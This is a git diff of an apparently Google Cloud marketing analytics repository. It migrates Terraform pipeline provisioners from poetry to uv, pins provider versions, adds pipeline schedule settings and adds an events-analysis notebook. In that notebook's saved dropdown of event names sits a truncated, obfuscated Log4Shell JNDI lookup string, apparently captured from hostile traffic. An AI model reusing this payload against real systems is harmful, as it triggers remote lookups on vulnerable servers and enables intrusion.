"compile_auto_segmentation_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.training -o auto_segmentation_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f auto_segmentation_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.training -i auto_segmentation_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.training -o auto_segmentation_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f auto_segmentation_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.training -i auto_segmentation_training.yaml EOT working_dir = self.triggers.working_dir } @@ -679,9 +794,9 @@ resource "null_resource" "compile_auto_segmentation_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.prediction -o auto_segmentation_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f auto_segmentation_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.prediction -i auto_segmentation_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.prediction -o auto_segmentation_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f auto_segmentation_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.prediction -i auto_segmentation_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -700,9 +815,9 @@ resource "null_resource" "compile_value_based_bidding_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.training -o vbb_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f vbb_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.training -i vbb_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.training -o vbb_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f vbb_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.training -i vbb_training.yaml EOT working_dir = self.triggers.working_dir } @@ -721,9 +836,9 @@ resource "null_resource" "compile_value_based_bidding_explanation_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.explanation -o vbb_explanation.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f vbb_explanation.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.explanation -i vbb_explanation.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.explanation -o vbb_explanation.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f vbb_explanation.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.explanation -i vbb_explanation.yaml EOT working_dir = self.triggers.working_dir } @@ -742,9 +857,9 @@ resource "null_resource" "compile_churn_propensity_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.training -o churn_propensity_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f churn_propensity_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.training -i churn_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.training -o churn_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f churn_propensity_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.training -i churn_propensity_training.yaml EOT working_dir = self.triggers.working_dir } @@ -763,9 +878,9 @@ resource "null_resource" "compile_churn_propensity_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.prediction -o churn_propensity_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f churn_propensity_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.prediction -i churn_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.prediction -o churn_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f churn_propensity_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.prediction -i churn_propensity_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -784,9 +899,9 @@ resource "null_resource" "compile_reporting_preparation_aggregate_predictions_pi # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.reporting_preparation.execution -o reporting_preparation.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f reporting_preparation.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.reporting_preparation.execution -i reporting_preparation.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.reporting_preparation.execution -o reporting_preparation.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f reporting_preparation.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.reporting_preparation.execution -i reporting_preparation.yaml EOT working_dir = self.triggers.working_dir } @@ -805,10 +920,10 @@ resource "null_resource" "compile_gemini_insights_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.gemini_insights.execution -o gemini_insights.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f gemini_insights.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.gemini_insights.execution -i gemini_insights.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.gemini_insights.execution -o gemini_insights.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f gemini_insights.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.gemini_insights.execution -i gemini_insights.yaml EOT working_dir = self.triggers.working_dir } -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/pipelines/variables.tf b/infrastructure/terraform/modules/pipelines/variables.tf index 3afaaed3..3c618cac 100644 --- a/infrastructure/terraform/modules/pipelines/variables.tf +++ b/infrastructure/terraform/modules/pipelines/variables.tf @@ -17,13 +17,8 @@ variable "config_file_path" { description = "pipelines config file" } -variable "poetry_run_alias" { - description = "alias for poetry run command on the current system" - type = string -} - -variable "poetry_installed" { - description = "Construct to specify dependency to poetry installed" +variable "uv_run_alias" { + description = "alias for uv run command on the current system" type = string } diff --git a/infrastructure/terraform/modules/pipelines/versions.tf b/infrastructure/terraform/modules/pipelines/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/modules/pipelines/versions.tf +++ b/infrastructure/terraform/modules/pipelines/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/terraform-sample.tfvars b/infrastructure/terraform/terraform-sample.tfvars index d52b9d0f..dedf5792 100644 --- a/infrastructure/terraform/terraform-sample.tfvars +++ b/infrastructure/terraform/terraform-sample.tfvars @@ -16,10 +16,7 @@ tf_state_project_id = "Google Cloud project where the terraform state file is stored" -create_dev_environment = false -create_staging_environment = false -create_prod_environment = true - +deploy_dataform = true deploy_activation = true deploy_feature_store = true deploy_pipelines = true @@ -28,6 +25,7 @@ deploy_monitoring = true #################### DATA VARIABLES ################################# data_project_id = "Project id where the MDS datasets will be created" +property_id = "Google Analytics 4 property id to identify an unique MDS deployment" destination_data_location = "BigQuery location (either regional or multi-regional) for the MDS BigQuery datasets." 
data_processing_project_id = "Project id where the Dataform will be installed and run" source_ga4_export_project_id = "Project id which contains the GA4 export dataset" @@ -40,6 +38,170 @@ source_ads_export_data = [ #################### FEATURE STORE VARIABLES ################################# feature_store_project_id = "Project ID where feature store resources will be created" +# These variables are going to become optional with future deployment +# List of comma separated events used in the lead score feature engineering e.g. (["scroll_50", "scroll_90", "view_search_results", ..]) +non_ecomm_events_list = ["scroll_50", "view_search_results"] +# A target event for the lead score propensity feature engineering e.g. "login" +non_ecomm_target_event = "login" + +################### PIPELINE CONFIGURATIONS ################################## + +pipeline_configuration = { + feature-creation-auto-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-purchase-propensity = { + execution = { + schedule = { + state = "ACTIVE" + } + } + } + feature-creation-churn-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-customer-ltv = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-aggregated-value-based-bidding = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-lead-score-propensity = { + execution = { + schedule = { + state = "ACTIVE" + } + } + } + value_based_bidding = { + training = { + schedule = { + state = "PAUSED" + } + } + explanation = { + schedule = { + state = "PAUSED" + } + } + } + purchase_propensity = { + training = { + schedule = { + state = "ACTIVE" + } + } + prediction = { + schedule = { + state = "ACTIVE" + } + } + } + churn_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + auto_segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + propensity_clv = { + training = { + schedule = { + state = "PAUSED" + } + } + } + clv = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + lead_score_propensity = { + training = { + schedule = { + state = "ACTIVE" + } + } + prediction = { + schedule = { + state = "ACTIVE" + } + } + } + + gemini_insights = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + reporting_preparation = { + execution = { + schedule = { + state = "PAUSED" + } + } +} #################### ML MODEL VARIABLES ################################# @@ -47,19 +209,19 @@ website_url = "Customer Website URL" # i.e. 
"https://shop.googlemerchandisestore #################### ACTIVATION VARIABLES ################################# -activation_project_id = "Project ID where activation resources will be created" +activation_project_id = "Project ID where activation resources will be created" #################### GA4 VARIABLES ################################# -ga4_property_id = "Google Analytics property id" -ga4_stream_id = "Google Analytics data stream id" -ga4_measurement_id = "Google Analytics measurement id" -ga4_measurement_secret = "Google Analytics measurement secret" +ga4_property_id = "Google Analytics property id" +ga4_stream_id = "Google Analytics data stream id" +ga4_measurement_id = "Google Analytics measurement id" +ga4_measurement_secret = "Google Analytics measurement secret" #################### GITHUB VARIABLES ################################# -project_owner_email = "Project owner email" -dataform_github_repo = "URL of the GitHub or GitLab repo which contains the Dataform scripts. Should start with https://" +project_owner_email = "Project owner email" +dataform_github_repo = "URL of the GitHub or GitLab repo which contains the Dataform scripts. Should start with https://" # Personal access tokens are intended to access GitHub resources on behalf of yourself. # Generate a github developer token for the repo above following this link: # https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/managing-your-personal-access-tokens#creating-a-personal-access-token-classic diff --git a/infrastructure/terraform/variables.tf b/infrastructure/terraform/variables.tf index 978b6480..38d46a79 100644 --- a/infrastructure/terraform/variables.tf +++ b/infrastructure/terraform/variables.tf @@ -17,6 +17,11 @@ variable "tf_state_project_id" { type = string } +variable "main_project_id" { + type = string + description = "Project ID where feature store resources are created" +} + variable "data_project_id" { description = "Default project to contain the MDS BigQuery datasets" type = string @@ -56,7 +61,7 @@ variable "project_owner_email" { } variable "dataform_github_repo" { - description = "Private Github repo for Dataform." + description = "Private GitHub repo for Dataform." type = string validation { condition = substr(var.dataform_github_repo, 0, 8) == "https://" @@ -65,7 +70,7 @@ variable "dataform_github_repo" { } variable "dataform_github_token" { - description = "Github token for Dataform repo." + description = "GitHub token for Dataform repo." type = string } @@ -81,12 +86,6 @@ variable "pipelines_github_owner" { default = "temporarily unused" } -variable "create_dev_environment" { - description = "Indicates that a development environment needs to be created" - type = bool - default = true -} - variable "dev_data_project_id" { description = "Project ID of where the dev datasets will created. If not provided, data_project_id will be used." type = string @@ -99,12 +98,6 @@ variable "dev_destination_data_location" { default = "" } -variable "create_staging_environment" { - description = "Indicates that a staging environment needs to be created" - type = bool - default = true -} - variable "staging_data_project_id" { description = "Project ID of where the staging datasets will created. If not provided, data_project_id will be used." 
type = string @@ -117,10 +110,10 @@ variable "staging_destination_data_location" { default = "" } -variable "create_prod_environment" { - description = "Indicates that a production environment needs to be created" - type = bool - default = true +variable "property_id" { + description = "Google Analytics 4 Property ID to install the MDS" + type = string + default = "" } variable "prod_data_project_id" { @@ -147,8 +140,8 @@ variable "source_ga4_export_dataset" { variable "ga4_incremental_processing_days_back" { description = "Past number of days to process GA4 exported data" - type = string - default = "3" + type = string + default = "3" } variable "source_ads_export_data" { @@ -189,6 +182,18 @@ variable "ga4_measurement_secret" { sensitive = true } +variable "deploy_dataform" { + description = "Toggler for activation module" + type = bool + default = false +} + +variable "deploy_purchase_propensity" { + description = "Toggler for purchase propensity module" + type = bool + default = false +} + variable "deploy_activation" { description = "Toggler for activation module" type = bool @@ -219,16 +224,16 @@ variable "mds_dataset_prefix" { default = "marketing_ga4_v1" } -variable "feature_store_config_env" { - description = "determine which config file is used for feature store deployment" +variable "global_config_env" { + description = "determine which config file is used for globaly for deployment" type = string default = "config" } -variable "poetry_cmd" { - description = "alias for poetry run command on the current system" +variable "uv_cmd" { + description = "alias for uv run command on the current system" type = string - default = "poetry" + default = "uv" } variable "feature_store_project_id" { @@ -238,6 +243,199 @@ variable "feature_store_project_id" { variable "website_url" { description = "Website url to be provided to the auto segmentation model" - type = string - default = null + type = string + default = null +} + +variable "time_zone" { + description = "Timezone for scheduled jobs" + type = string + default = "America/New_York" +} + +variable "pipeline_configuration" { + description = "Pipeline configuration that will alternate certain settings in the config.yaml.tftpl" + type = map( + map( + object({ + schedule = object({ + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. 
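+        # An illustrative terraform.tfvars override (a sketch, not a complete value) that turns on
+        # only the purchase propensity schedules would include, among the other keys:
+        #
+        #   purchase_propensity = {
+        #     training   = { schedule = { state = "ACTIVE" } }
+        #     prediction = { schedule = { state = "ACTIVE" } }
+        #   }
+        #
+        # A value supplied via tfvars replaces this default map rather than being merged with it,
+        # so overrides normally list every pipeline, as terraform-sample.tfvars does.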
+ state = string + }) + }) + ) + ) + + default = { + feature-creation-auto-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-purchase-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-churn-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-customer-ltv = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-aggregated-value-based-bidding = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-lead-score-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + value_based_bidding = { + training = { + schedule = { + state = "PAUSED" + } + } + explanation = { + schedule = { + state = "PAUSED" + } + } + } + purchase_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + churn_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + auto_segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + propensity_clv = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + clv = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + lead_score_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + } + validation { + condition = alltrue([ + for p in keys(var.pipeline_configuration) : alltrue([ + for c in keys(var.pipeline_configuration[p]) : ( + try(var.pipeline_configuration[p][c].schedule.state, "") == "ACTIVE" || + try(var.pipeline_configuration[p][c].schedule.state, "") == "PAUSED" + ) + ]) + ]) + error_message = "The 'state' field must be either 'PAUSED' or 'ACTIVE' for all pipeline configurations." 
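+    # The nested alltrue/try expressions above walk every pipeline and every configuration under
+    # it; try() falls back to "" when a schedule block is missing, so incomplete entries fail this
+    # validation instead of slipping through.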
+ } +} + + +variable "non_ecomm_events_list" { + description = "Short list of prioritized events that are correlated to the non ecommerce target event" + type = list(string) + default = ["scroll_50", "view_search_results"] +} + +variable "non_ecomm_target_event" { + description = "Non ecommerce target event for the lead score propensity feature transformation" + type = string + default = "login" } diff --git a/infrastructure/terraform/versions.tf b/infrastructure/terraform/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/versions.tf +++ b/infrastructure/terraform/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/notebooks/events_analysis.ipynb b/notebooks/events_analysis.ipynb new file mode 100644 index 00000000..7800a2c6 --- /dev/null +++ b/notebooks/events_analysis.ipynb @@ -0,0 +1,6786 @@ +{ + "nbformat": 4, + "nbformat_minor": 0, + "metadata": { + "colab": { + "provenance": [] + }, + "kernelspec": { + "name": "python3", + "display_name": "Python 3" + }, + "language_info": { + "name": "python" + }, + "widgets": { + "application/vnd.jupyter.widget-state+json": { + "510a3c2ce1f249c291aeaa8ea214a127": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_dd70738e3b794fff8c79a13d8dedc202", + "IPY_MODEL_b1fc882904974aacaa704e8e1f871227" + ], + "layout": "IPY_MODEL_5240f36b552e48eeb8d3ddcbeaf9f004" + } + }, + "dd70738e3b794fff8c79a13d8dedc202": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DropdownModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DropdownModel", + "_options_labels": [ + "view_search_results", + "view_promotion", + "view_item_list", + "view_item", + "view_cart", + "video_play", + "user_engagement", + "session_start", + "select_promotion", + "select_item", + "scroll", + "remove_from_cart", + "purchase", + "page_view", + "maj_purchase_propensity_vbb_30_15", + "maj_purchase_propensity_30_15", + "maj_cltv_180_30", + "maj_churn_propensity_30_15", + "maj_audience_segmentation_15", + "imported", + "first_visit", + "errors", + "click", + "begin_checkout", + "ads_conversion_Checkout_1", + "add_to_wishlist", + "add_to_cart", + "add_shipping_info", + "add_payment_info", + "${jndi:dns://33${::-.}post${::-.}analyti" + ], + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "DropdownView", + "description": "Target:", + "description_tooltip": null, + "disabled": false, + "index": 12, + "layout": "IPY_MODEL_f25457004bb5499aa7301831d9337ab7", + "style": "IPY_MODEL_7bea3caf6e954ec4850290f791b790db" + } + }, + "b1fc882904974aacaa704e8e1f871227": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": 
"@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ButtonView", + "button_style": "", + "description": "Confirm Target", + "disabled": false, + "icon": "", + "layout": "IPY_MODEL_b55f0d2197ef4068979e6ac7613658c1", + "style": "IPY_MODEL_c5fb7e585532423f85122c3e4d118bea", + "tooltip": "" + } + }, + "5240f36b552e48eeb8d3ddcbeaf9f004": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "f25457004bb5499aa7301831d9337ab7": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "7bea3caf6e954ec4850290f791b790db": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "b55f0d2197ef4068979e6ac7613658c1": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + 
"model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "c5fb7e585532423f85122c3e4d118bea": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "button_color": null, + "font_weight": "" + } + }, + "a7e3ea48a523462daeac82d4f5640101": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_dd70738e3b794fff8c79a13d8dedc202", + "IPY_MODEL_b1fc882904974aacaa704e8e1f871227" + ], + "layout": "IPY_MODEL_bc83fabc3fd04f66aa62826ac7014f1f" + } + }, + "bc83fabc3fd04f66aa62826ac7014f1f": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + 